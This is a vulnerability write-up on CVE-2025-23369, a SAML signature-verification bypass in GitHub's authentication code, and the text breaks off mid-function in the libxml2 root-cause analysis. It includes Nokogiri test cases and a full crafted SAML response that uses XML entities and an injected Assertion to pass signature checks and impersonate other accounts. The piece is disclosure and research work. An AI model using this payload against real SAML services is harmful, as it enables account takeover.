Last year, GitHub issued several CVEs for issues affecting its SAML authentication implementation; for example, you can read about CVE-2024-4985 and CVE-2024-9487 on the ProjectDiscovery blog. I decided to take a look in case some problems were still left. This led to the discovery of CVE-2025-23369, a SAML verification bypass that allows a SAML-authenticated user to bypass authentication for other accounts.

SAML primer

SAML works much like OAuth2/OpenID: a user authenticates to an IdP, and the result is handed to the service provider. In OAuth2/OpenID, the IdP returns an access token to the service provider, which then uses it to fetch the user's identity from a protected IdP endpoint. SAML, on the other hand, does not return an access token but rather a Response object containing the user attributes (email, name, ...). Here is an example SAML response:

<?xml version="1.0"?>

<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="pfx577f9dc6-42bf-b9ba-27d8-a5f9fa8fad9b" Version="2.0" IssueInstant="2014-07-17T01:01:48Z" Destination="http://sp.example.com/demo1/index.php?acs" InResponseTo="ONELOGIN_4fee3b046395c4e751011e97f8900b5273d56685">

<saml:Issuer>http://idp.example.com/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">

<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>

<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>

<ds:Reference URI="#pfx577f9dc6-42bf-b9ba-27d8-a5f9fa8fad9b"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>xeANAiB+fMHC0Lgov5lDi4UPDqk=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>ra8t31DARCSl2weKKSqmCXkTxALzPqIU/uivuPWrmZqYgpKAPk48sSObm7VkwCeb63DrvCJnhbEiEU1Ly63dL9Kz3x3iMclUa0S5+CrhcSV94XreEx3KcY6D/sA+nnyVd1ULPCBCShMf64MYwgniezWWsy//iAD1lK3wLKy7uLw=</ds:SignatureValue>

<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICajCCAdOgAwIBAgIBADANBgkqhkiG9w0BAQ0FADBSMQswCQYDVQQGEwJ1czETMBEGA1UECAwKQ2FsaWZvcm5pYTEVMBMGA1UECgwMT25lbG9naW4gSW5jMRcwFQYDVQQDDA5zcC5leGFtcGxlLmNvbTAeFw0xNDA3MTcxNDEyNTZaFw0xNTA3MTcxNDEyNTZaMFIxCzAJBgNVBAYTAnVzMRMwEQYDVQQIDApDYWxpZm9ybmlhMRUwEwYDVQQKDAxPbmVsb2dpbiBJbmMxFzAVBgNVBAMMDnNwLmV4YW1wbGUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDZx+ON4IUoIWxgukTb1tOiX3bMYzYQiwWPUNMp+Fq82xoNogso2bykZG0yiJm5o8zv/sd6pGouayMgkx/2FSOdc36T0jGbCHuRSbtia0PEzNIRtmViMrt3AeoWBidRXmZsxCNLwgIV6dn2WpuE5Az0bHgpZnQxTKFek0BMKU/d8wIDAQABo1AwTjAdBgNVHQ4EFgQUGHxYqZYyX7cTxKVODVgZwSTdCnwwHwYDVR0jBBgwFoAUGHxYqZYyX7cTxKVODVgZwSTdCnwwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQByFOl+hMFICbd3DJfnp2Rgd/dqttsZG/tyhILWvErbio/DEe98mXpowhTkC04ENprOyXi7ZbUqiicF89uAGyt1oqgTUCD1VsLahqIcmrzgumNyTwLGWo17WDAa1/usDhetWAMhgzF/Cnf5ek0nK00m0YZGyc4LzgD0CROMASTWNg==</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature>

<samlp:Status>

<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>

</samlp:Status>

<saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="pfx0dc1f020-3fa4-fa8c-17c6-b1d9582401d1" Version="2.0" IssueInstant="2014-07-17T01:01:48Z">

<saml:Issuer>http://idp.example.com/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">

<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>

<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>

<ds:Reference URI="#pfx0dc1f020-3fa4-fa8c-17c6-b1d9582401d1"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>/qU1zv7GdHocY1JgnyHyKyQrC4w=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>WuqrYfX9+rKdoLcvPlLPozhc3GQmD/FYjftSdrKyrXBX6AFcTYQnr7u0lqEKt97IFzV0D/BwFDHmgqmHiq0VfAKmeM1ITqb4mSUjLW5+SE7wdp1hsM+W4kqsCAMhZrLIn2noyV/Gy4Ig9miRDFVezHsBVcRDrd8zMmBYUBFCspI=</ds:SignatureValue>

<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICajCCAdOgAwIBAgIBADANBgkqhkiG9w0BAQ0FADBSMQswCQYDVQQGEwJ1czETMBEGA1UECAwKQ2FsaWZvcm5pYTEVMBMGA1UECgwMT25lbG9naW4gSW5jMRcwFQYDVQQDDA5zcC5leGFtcGxlLmNvbTAeFw0xNDA3MTcxNDEyNTZaFw0xNTA3MTcxNDEyNTZaMFIxCzAJBgNVBAYTAnVzMRMwEQYDVQQIDApDYWxpZm9ybmlhMRUwEwYDVQQKDAxPbmVsb2dpbiBJbmMxFzAVBgNVBAMMDnNwLmV4YW1wbGUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDZx+ON4IUoIWxgukTb1tOiX3bMYzYQiwWPUNMp+Fq82xoNogso2bykZG0yiJm5o8zv/sd6pGouayMgkx/2FSOdc36T0jGbCHuRSbtia0PEzNIRtmViMrt3AeoWBidRXmZsxCNLwgIV6dn2WpuE5Az0bHgpZnQxTKFek0BMKU/d8wIDAQABo1AwTjAdBgNVHQ4EFgQUGHxYqZYyX7cTxKVODVgZwSTdCnwwHwYDVR0jBBgwFoAUGHxYqZYyX7cTxKVODVgZwSTdCnwwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQByFOl+hMFICbd3DJfnp2Rgd/dqttsZG/tyhILWvErbio/DEe98mXpowhTkC04ENprOyXi7ZbUqiicF89uAGyt1oqgTUCD1VsLahqIcmrzgumNyTwLGWo17WDAa1/usDhetWAMhgzF/Cnf5ek0nK00m0YZGyc4LzgD0CROMASTWNg==</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature>

<saml:Subject>

<saml:NameID SPNameQualifier="http://sp.example.com/demo1/metadata.php" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">test@example.com</saml:NameID>

<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">

<saml:SubjectConfirmationData NotOnOrAfter="2024-01-18T06:21:48Z" Recipient="http://sp.example.com/demo1/index.php?acs" InResponseTo="ONELOGIN_4fee3b046395c4e751011e97f8900b5273d56685"/>

</saml:SubjectConfirmation>

</saml:Subject>

<saml:Conditions NotBefore="2014-07-17T01:01:18Z" NotOnOrAfter="2024-01-18T06:21:48Z">

<saml:AudienceRestriction>

<saml:Audience>http://sp.example.com/demo1/metadata.php</saml:Audience>

</saml:AudienceRestriction>

</saml:Conditions>

<saml:AuthnStatement AuthnInstant="2014-07-17T01:01:48Z" SessionNotOnOrAfter="2024-07-17T09:01:48Z" SessionIndex="_be9967abd904ddcae3c0eb4189adbe3f71e327cf93">

<saml:AuthnContext>

<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>

</saml:AuthnContext>

</saml:AuthnStatement>

<saml:AttributeStatement>

<saml:Attribute Name="uid" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">

<saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="mail" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">

<saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>

</saml:Attribute>

<saml:Attribute Name="eduPersonAffiliation" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">

<saml:AttributeValue xsi:type="xs:string">users</saml:AttributeValue>

<saml:AttributeValue xsi:type="xs:string">examplerole1</saml:AttributeValue>

</saml:Attribute>

</saml:AttributeStatement>

</saml:Assertion>

</samlp:Response>

The Response contains an Assertion, which carries the authenticated user's attributes. The NameID element is what is usually used to identify the authenticated user (email, user ID, ...). The response is protected against tampering by the Signature element: DigestValue holds the hash of the element the signature refers to (Response or Assertion), and the SignedInfo element is then signed by the IdP, with the signature stored in SignatureValue. Any tampering with the protected element makes DigestValue incorrect, and any tampering with DigestValue makes SignatureValue incorrect.
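The digest-then-signature chain can be sketched in a few lines of Ruby. This is a simplified illustration and not how any real SAML library does it: plain strings stand in for canonicalized XML, SHA-256 is used instead of the SHA-1 shown in the sample response, and `b64`, `sign_element`, and `verify_element` are hypothetical helper names.

```ruby
require 'openssl'

# Strict Base64 without newlines (hypothetical helper).
def b64(bytes)
  [bytes].pack('m0')
end

# Assumption: a real implementation canonicalizes the XML (exc-c14n) first;
# here the raw string plays the role of the canonical form.
def sign_element(element_xml, key)
  digest_value = b64(OpenSSL::Digest::SHA256.digest(element_xml))
  signed_info  = "<SignedInfo><DigestValue>#{digest_value}</DigestValue></SignedInfo>"
  signature    = b64(key.sign(OpenSSL::Digest.new('SHA256'), signed_info))
  { signed_info: signed_info, digest_value: digest_value, signature_value: signature }
end

def verify_element(element_xml, sig, public_key)
  # Step 1: the IdP's signature must cover SignedInfo (and thus DigestValue).
  signature_ok = public_key.verify(OpenSSL::Digest.new('SHA256'),
                                   sig[:signature_value].unpack1('m0'),
                                   sig[:signed_info])
  # Step 2: the digest inside SignedInfo must match the referenced element.
  expected  = b64(OpenSSL::Digest::SHA256.digest(element_xml))
  digest_ok = sig[:signed_info].include?("<DigestValue>#{expected}</DigestValue>")
  signature_ok && digest_ok
end

key       = OpenSSL::PKey::RSA.new(2048)
assertion = '<Assertion ID="_1"><NameID>test@example.com</NameID></Assertion>'
sig       = sign_element(assertion, key)

puts verify_element(assertion, sig, key.public_key)                        # untouched element
puts verify_element(assertion.sub('test@', 'admin@'), sig, key.public_key) # tampered element
```

Note that both steps only say something about the element that was hashed; which element that is depends entirely on how the Reference URI is resolved.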

GitHub SAML verification

After constructing the SAML Response from the POST request, #validate is called to verify it.

def validate(options)
  if !SAML.mocked[:skip_validate_signature]
    validate_has_signature
    validate_certificate(options[:idp_certificate]) if certificate_expiration_check_enabled?
    validate_assertion_digest_values
    if GitHub.enterprise? && GitHub.saml_encrypted_assertions?
      validate_signatures_ghes(options[:idp_certificate])
    else
      validate_signatures(options[:idp_certificate])
    end
    # Stop validation early when signature validation fails
    return if self.errors.any?
  end
  validate_has_assertion unless SAML.mocked[:skip_validate_has_assertion]
  validate_issuer(options[:issuer])
  validate_destination(options[:sp_url])
  validate_recipient(options[:sp_url])
  validate_conditions
  validate_audience(audience_url(options[:sp_url]))
  validate_name_id_format(options[:name_id_format])
  validate_administrator(options[:require_admin])
  has_multiple_assertions = document.xpath("//saml2:Assertion", namespaces).count > 1
  has_errors = !self.errors.empty?
  has_root_sig = has_root_sig_and_matching_ref?
  GitHub.dogstats.increment(
    "external_identities.saml.assertions",
    tags: [
      "has_multiple_assertions:#{has_multiple_assertions}",
      "has_errors:#{has_errors}",
      "has_root_sig:#{has_root_sig}"
    ]
  )
end

The signature checks are done by #validate_has_signature, #validate_assertion_digest_values, and #validate_signatures.

def has_root_sig_and_matching_ref?
  root_ref = document.at("/saml2p:Response/ds:Signature/ds:SignedInfo/ds:Reference", namespaces)
  return false unless root_ref
  root_ref_uri = String(String(root_ref["URI"])[1..-1]) # chop off leading #
  return false unless root_ref_uri.length > 1
  root_rep = document.at("/saml2p:Response", namespaces)
  root_id = String(root_rep["ID"])
  # and finally does the root ref URI match the root ID?
  root_ref_uri == root_id
end

def self.signatures(doc)
  signatures = doc.xpath("//ds:Signature", Xmldsig::NAMESPACES)
  signatures.reverse.collect do |node|
    Xmldsig::Signature.new(node)
  end || []
end

def all_assertion_digests_valid?
  # if there is a root sig, that will be validated by Xmldsig separately
  return true if has_root_sig_and_matching_ref?
  # note that we need to copy the doc here because we're going to modify it
  assertions = document.dup.xpath("//saml2:Assertion", namespaces)
  assertions.all? do |assertion|
    signature_ref = assertion.at("./ds:Signature/ds:SignedInfo/ds:Reference", namespaces)
    return false unless signature_ref
    assertion_id = String(assertion["ID"])
    ref_uri = String(String(signature_ref["URI"])[1..-1]) # chop off leading #
    return false unless ref_uri.length > 1
    return false unless assertion_id == ref_uri
    xml_signature_ref = Xmldsig::Reference.new(signature_ref)
    actual_digest = xml_signature_ref.digest_value
    calculated_digest = calculate_assertion_digest(assertion, xml_signature_ref)
    digest_valid = calculated_digest == actual_digest
    digest_valid
  end
end

def validate_has_signature
  # Return early if entire response is signed. This prevents individual
  # assertions from being tampered because any change in the response
  # would invalidate the entire response.
  return if has_root_sig_and_matching_ref?
  return if all_assertions_signed_with_matching_ref?
  self.errors << "SAML Response is not signed or has been modified."
end

def validate_assertion_digest_values
  return if all_assertion_digests_valid?
  self.errors << "SAML Response has been modified."
end

def validate_signatures(raw_cert)
  unless raw_cert
    self.errors << "No Certificate"
    return
  end
  certificate = OpenSSL::X509::Certificate.new(raw_cert)
  unless signatures.all? { |signature| signature.valid?(certificate) }
    self.errors << "Digest mismatch"
  end
rescue Xmldsig::SchemaError => e
  self.errors << "Invalid signature"
rescue OpenSSL::X509::CertificateError => e
  self.errors << "Certificate error: '#{e.message}'"
end

The code does a fast check with #has_root_sig_and_matching_ref? and returns early in both #validate_has_signature and #validate_assertion_digest_values. The fast check itself makes sense: if the root element (Response) is signed, it is wasteful to check the integrity of the child elements (Assertion). #validate_signatures is called afterwards; it uses the xmldsig library to verify all the signatures found in the XML document.

def has_root_sig_and_matching_ref?
  return true if SAML.mocked[:mock_root_sig]
  root_ref = document.at("/saml2p:Response/ds:Signature/ds:SignedInfo/ds:Reference", namespaces)
  return false unless root_ref
  root_ref_uri = String(String(root_ref["URI"])[1..-1]) # chop off leading #
  return false unless root_ref_uri.length > 1
  root_rep = document.at("/saml2p:Response", namespaces)
  root_id = String(root_rep["ID"])
  # and finally does the root ref URI match the root ID?
  root_ref_uri == root_id
end

#has_root_sig_and_matching_ref? is pretty simple: it selects the Signature element under the Response element and checks whether it actually references the root element by comparing the root's ID attribute with the URI of the signature reference.

When signature.valid? is called, #referenced_node is invoked internally to find the element referenced by the signature. It uses an XPath query that compares the ID attribute of every element in the document with the signature's reference URI.

def referenced_node
  if reference_uri && reference_uri != ""
    if @id_attr.nil? && reference_uri.start_with?("cid:")
      content_id = reference_uri[4..-1]
      if @referenced_documents.has_key?(content_id)
        @referenced_documents[content_id].dup
      else
        raise(
          ReferencedNodeNotFound,
          "Could not find referenced document with ContentId #{content_id}"
        )
      end
    else
      id = reference_uri[1..-1]
      referenced_node_xpath = @id_attr ? "//*[@#{@id_attr}=$uri]" : "//*[@ID=$uri or @wsu:Id=$uri]"
      variable_bindings = { 'uri' => id }
      if ref = document.dup.at_xpath(referenced_node_xpath, NAMESPACES, variable_bindings)
        ref
      else
        raise(
          ReferencedNodeNotFound,
          "Could not find the referenced node #{id}'"
        )
      end
    end
  else
    document.dup.root
  end
end

Since this verifies the signature of whatever element the XPath query returns, the SAML verification can be bypassed if #has_root_sig_and_matching_ref? succeeds while the XPath query returns some element other than the root.
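To make the gap concrete, here is a toy model in plain Ruby. It is not GitHub's or xmldsig's code: `Node`, `dom_id`, and `xpath_id` are hypothetical names, and the two "views" of each ID are hard-coded to disagree, purely to show what goes wrong when the check and the lookup resolve the same reference differently.

```ruby
# Toy model: dom_id is what reading the attribute returns, xpath_id is what
# the ID lookup matches against (nil means the lookup never matches the node).
Node = Struct.new(:name, :dom_id, :xpath_id)

# Counterpart of the fast check: does the reference URI equal the root's ID?
def root_ref_matches?(root, reference_uri)
  root.dom_id == reference_uri.delete_prefix('#')
end

# Counterpart of the signature lookup: first node in document order whose ID
# matches, as seen by the lookup.
def referenced_node(nodes, reference_uri)
  wanted = reference_uri.delete_prefix('#')
  nodes.find { |node| node.xpath_id == wanted }
end

root     = Node.new('Response', '_129', nil)                 # invisible to the lookup
injected = Node.new('Assertion (injected)', 'A_129', '_129') # visible under the root's ID
document = [root, injected]

puts root_ref_matches?(root, '#_129')       # the fast check is satisfied
puts referenced_node(document, '#_129').name # but the signature covers this node
```

Whenever the two functions can disagree like this, a signature that is valid for the injected node is accepted as if it covered the whole Response.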

The bypass

I started with a minimal test case with the constraints the original code has:

require 'nokogiri'

xml = <<-XML
<?xml version="1.0"?>
<samlp:Response ID="_129">
  <saml:Assertion ID="_129">http://idp.example.com/metadata.php</saml:Assertion>
</samlp:Response>
XML

doc = Nokogiri::XML(xml)
abort "root id is not correct" unless doc.root['ID'] == "_129"
book = doc.xpath('//*[@ID=$uri or @wsu:Id=$uri]', {"wsu": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"}, {"uri": "_129"})
puts book[0]

The XPath query in the code above returns the Response element, as expected. After some manual fuzzing, I started testing with XML entities. The following code returned the Assertion element, even though the root ID was still correct:

require 'nokogiri'

xml = <<-XML
<?xml version="1.0"?>
<!DOCTYPE abcd [ <!ENTITY idViaEntity "_129"> ]>
<samlp:Response ID="&idViaEntity;">
  <saml:Assertion ID="_129">http://idp.example.com/metadata.php</saml:Assertion>
</samlp:Response>
XML

doc = Nokogiri::XML(xml)
abort "root id is not correct" unless doc.root['ID'] == "_129"
book = doc.xpath('//*[@ID=$uri or @wsu:Id=$uri]', {"wsu": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"}, {"uri": "_129"})
puts book[0]


With this inconsistency, we can make #referenced_node mistake an arbitrary element for the root element. I quickly put this to the test: I extracted the SAML library and called it using this code:

require './saml'
require './saml/message'
require 'base64'
require 'time'
require 'cgi'

r = File.read("samlresponse").strip
r = SAML::Message.from_param(Base64.encode64(r))
valid = r.valid?(:idp_certificate =><<END
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
END
)
puts "Valid? #{valid}"
puts "Errors: #{r.errors}" unless valid
puts "NameID: #{r.name_id}" if valid

And this simplified SAML response:

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE abcd [ <!ENTITY idViaEntity "id198723974770096182351422"> ]>

<saml2p:Response

xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol"

xmlns:xs="http://www.w3.org/2001/XMLSchema" Destination="https://github.com/enterprises/abc/saml/consume" ID="&idViaEntity;" InResponseTo="_1024a04a4519b1491552b17bf639ded16fd55f1b16837d99f94046b66e25123b" IssueInstant="2024-12-30T21:08:55.894Z" Version="2.0">

<saml2:Issuer

xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">http://www.okta.com/exkm64rrt7jvmlpcX5d7

</saml2:Issuer>

<ds:Signature

xmlns:ds="http://www.w3.org/2000/09/xmldsig#">

<ds:SignedInfo>

<ds:Reference URI="#id198723974770096182351422"></ds:Reference>

<Object

xmlns="http://www.w3.org/2000/09/xmldsig#">

<saml2:Assertion

xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" ID="id198723974770096182351422" IssueInstant="2024-12-30T21:08:55.894Z" Version="2.0">

<!-- Injected Assertion -->

<ds:Signature>

<ds:SignedInfo>

<ds:Reference URI="#id198723974770096182351422"></ds:Reference>

</ds:SignedInfo>

</ds:Signature>

</saml2:Assertion>

</Object>

</ds:SignedInfo>

</ds:Signature>

<saml2p:Status

xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol">

<saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>

</saml2p:Status>

<saml2:Assertion

xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"

xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="id198723974770096182351422ffff" IssueInstant="2024-12-30T21:08:55.894Z" Version="2.0">

<!-- Original Assertion -->

</saml2:Assertion>

</saml2p:Response>

The script failed because the ID attribute is duplicated: the SAML code validates the document against the schema before proceeding to validate the document content. Prefixing the injected Assertion's ID with a second entity gets past that check:

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE abcd [ <!ENTITY idViaEntity "id198723974770096182351422"> <!ENTITY BypassIDUniqness "A"> ]>

<saml2p:Response

xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol"

xmlns:xs="http://www.w3.org/2001/XMLSchema" Destination="https://github.com/enterprises/abc/saml/consume" ID="&idViaEntity;" InResponseTo="_1024a04a4519b1491552b17bf639ded16fd55f1b16837d99f94046b66e25123b" IssueInstant="2024-12-30T21:08:55.894Z" Version="2.0">

<saml2:Issuer

xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">http://www.okta.com/exkm64rrt7jvmlpcX5d7

</saml2:Issuer>

<ds:Signature

xmlns:ds="http://www.w3.org/2000/09/xmldsig#">

<ds:SignedInfo>

<ds:Reference URI="#id198723974770096182351422"></ds:Reference>

<Object

xmlns="http://www.w3.org/2000/09/xmldsig#">

<saml2:Assertion

xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion" ID="&BypassIDUniqness;id198723974770096182351422" IssueInstant="2024-12-30T21:08:55.894Z" Version="2.0">

<!-- Injected Assertion -->

<ds:Signature>

<ds:SignedInfo>

<ds:Reference URI="#id198723974770096182351422"></ds:Reference>

</ds:SignedInfo>

</ds:Signature>

</saml2:Assertion>

</Object>

</ds:SignedInfo>

</ds:Signature>

<saml2p:Status

xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol">

<saml2p:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>

</saml2p:Status>

<saml2:Assertion

xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"

xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="id198723974770096182351422ffff" IssueInstant="2024-12-30T21:08:55.894Z" Version="2.0">

<!-- Original Assertion -->

</saml2:Assertion>

</saml2p:Response>

The SAML response can now be verified with a Signature that does not actually point to the root element, but rather to our injected Assertion inside SignedInfo/Object (we inject it there because the schema definition of Object allows arbitrary elements inside it). You can find the exploit script here.

Root Cause Analysis

The bypass left me with some puzzling questions: how does the XPath query find our injected element by ID even though its ID is prefixed with an A, and why does it not find the root element in the first place, given that it comes first in the tree?

To answer these questions, I set out to hunt down the root cause. Nokogiri uses libxml2 internally, so for the RCA I created (with the help of ChatGPT) a minimal C test case that calls libxml2 directly with the default options Nokogiri uses and mimics the Ruby code, and linked it against a locally built libxml2 for debugging. Here is the C code for reference:

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <libxml/parser.h>

#include <libxml/xpath.h>

#include <libxml/xpathInternals.h>

static const xmlChar *NOKOGIRI_PREFIX = (const xmlChar *)"nokogiri";

static const xmlChar *NOKOGIRI_URI = (const xmlChar *)"http://www.nokogiri.org/default_ns/ruby/extensions_functions";

static const xmlChar *NOKOGIRI_BUILTIN_PREFIX = (const xmlChar *)"nokogiri-builtin";

static const xmlChar *NOKOGIRI_BUILTIN_URI = (const xmlChar *)"https://www.nokogiri.org/default_ns/ruby/builtins";

void print_element_info(xmlNode *node) {

if (!node) return;

printf("Element: %s\n", node->name);

xmlAttr *attr = node->properties;

while (attr) {

xmlChar *value = xmlNodeListGetString(node->doc, attr->children, 1);

printf(" Attribute: %s = %s\n", attr->name, value);

xmlFree(value);

attr = attr->next;

}

printf("\n");

}

void search_xpath(xmlDoc *doc, const char *uri) {

xmlXPathContext *xpathCtx = xmlXPathNewContext(doc);

if (!xpathCtx) {

fprintf(stderr, "Error: Unable to create new XPath context\n");

return;

}

xmlXPathRegisterNs(xpathCtx, NOKOGIRI_PREFIX, NOKOGIRI_URI);

xmlXPathRegisterNs(xpathCtx, NOKOGIRI_BUILTIN_PREFIX, NOKOGIRI_BUILTIN_URI);

if (xmlXPathRegisterNs(xpathCtx, (xmlChar *)"wsu", (xmlChar *)"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd") != 0) {

fprintf(stderr, "Error: Failed to register namespace 'wsu' -> 'http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd'\n");

return;

}

xmlXPathObject *uriObj = xmlXPathNewString((xmlChar *)uri);

if (xmlXPathRegisterVariable(xpathCtx, (xmlChar *)"uri", uriObj) != 0) {

fprintf(stderr, "Error: Failed to register the variable 'uri'\n");

return;

}

char xpathExpr[512];

snprintf(xpathExpr, sizeof(xpathExpr), "//*[@ID=$uri or @wsu:Id=$uri]");

xmlXPathObject *xpathObjResult = xmlXPathEvalExpression((xmlChar *)xpathExpr, xpathCtx);

if (!xpathObjResult) {

fprintf(stderr, "Error: Unable to evaluate XPath expression\n");

return;

}

xmlNodeSet *nodes = xpathObjResult->nodesetval;

if (nodes) {

for (int i = 0; i < nodes->nodeNr; i++) {

print_element_info(nodes->nodeTab[i]);

}

} else {

printf("No matching elements found for URI: %s\n", uri);

}

}

int main(int argc, char *argv[]) {

if (argc != 3) {

fprintf(stderr, "Usage: %s <xml_filename> <uri_to_search>\n", argv[0]);

return EXIT_FAILURE;

}

const char *filename = argv[1];

const char *uri = argv[2];

xmlDoc *doc = xmlReadFile(filename, NULL, XML_PARSE_RECOVER|XML_PARSE_NONET|XML_PARSE_BIG_LINES|XML_PARSE_NOERROR);

if (!doc) {

fprintf(stderr, "Error: Unable to parse XML file %s\n", filename);

return EXIT_FAILURE;

}

xmlNode *root = xmlDocGetRootElement(doc);

if (!root) {

fprintf(stderr, "Error: XML document has no root element\n");

xmlFreeDoc(doc);

return EXIT_FAILURE;

}

xmlChar *idValue = xmlGetProp(root, (const xmlChar *)"ID");

if (idValue) {

printf("Root Element: %s\n", root->name);

printf("Root ID Attribute: %s\n\n", idValue);

} else {

printf("Root Element: %s\n", root->name);

printf("Root element has no 'ID' attribute.\n\n");

}

search_xpath(doc, uri);

return EXIT_SUCCESS;

}

Feeding it this XML document as the first argument and _129 as the second yields pretty much the same result as the Ruby code:

<?xml version="1.0"?>

<!DOCTYPE abcd [ <!ENTITY idViaEntity "_129"> ]>

<samlp:Response ID="&idViaEntity;">

<saml:Assertion ID="_129">http://idp.example.com/metadata.php</saml:Assertion>

</samlp:Response>

The root element's ID is _129, but the XPath query selects Assertion and not Response.

After some debugging, it turned out that Response is not found because of how the XPath engine performs the comparison in the query. Here is the function responsible for comparing a candidate XML node with a string argument from the query (in this case _129):

static int

xmlXPathEqualNodeSetString(xmlXPathParserContextPtr ctxt,

xmlXPathObjectPtr arg, const xmlChar * str, int neq)

{

int i;

xmlNodeSetPtr ns;

xmlChar *str2;

unsigned int hash;

if ((str == NULL) || (arg == NULL) ||

((arg->type != XPATH_NODESET) && (arg->type != XPATH_XSLT_TREE)))

return (0);

ns = arg->nodesetval;

/*

* A NULL nodeset compared with a string is always false

* (since there is no node equal, and no node not equal)

*/

if ((ns == NULL) || (ns->nodeNr <= 0) )

return (0);

hash = xmlXPathStringHash(str);

for (i = 0; i < ns->nodeNr; i++) {

if (xmlXPathNodeValHash(ns->nodeTab[i]) == hash) {

str2 = xmlNodeGetContent(ns->nodeTab[i]);

if (str2 == NULL) {

xmlXPathPErrMemory(ctxt);

return(0);

}

if (xmlStrEqual(str, str2)) {

xmlFree(str2);

if (neq)

continue;

return (1);

} else if (neq) {

xmlFree(str2);

return (1);

}

xmlFree(str2);

} else if (neq)

return (1);

}

return (0);

}

As an optimization, this function checks the hash first; only if the hash matches does it compare the string with the node content (the ID attribute value in this case). Here is the code for xmlXPathNodeValHash:

static unsigned int

xmlXPathNodeValHash(xmlNodePtr node) {

int len = 2;

const xmlChar * string = NULL;

xmlNodePtr tmp = NULL;

unsigned int ret = 0;

if (node == NULL)

return(0);

if (node->type == XML_DOCUMENT_NODE) {

tmp = xmlDocGetRootElement((xmlDocPtr) node);

if (tmp == NULL)

node = node->children;

else

node = tmp;

if (node == NULL)

return(0);

}

switch (node->type) {

case XML_COMMENT_NODE:

case XML_PI_NODE:

case XML_CDATA_SECTION_NODE:

case XML_TEXT_NODE:

string = node->content;

if (string == NULL)

return(0);

if (string[0] == 0)

return(0);

return(string[0] + (string[1] << 8));

case XML_NAMESPACE_DECL:

string = ((xmlNsPtr)node)->href;

if (string == NULL)

return(0);

if (string[0] == 0)

return(0);

return(string[0] + (string[1] << 8));

case XML_ATTRIBUTE_NODE:

tmp = ((xmlAttrPtr) node)->children;

break;

case XML_ELEMENT_NODE:

tmp = node->children;

break;

default:

return(0);

}

while (tmp != NULL) {

switch (tmp->type) {

case XML_CDATA_SECTION_NODE:

case XML_TEXT_NODE:

string = tmp->content;

break;

default:

string = NULL;

break;

}

if ((string != NULL) && (string[0] != 0)) {

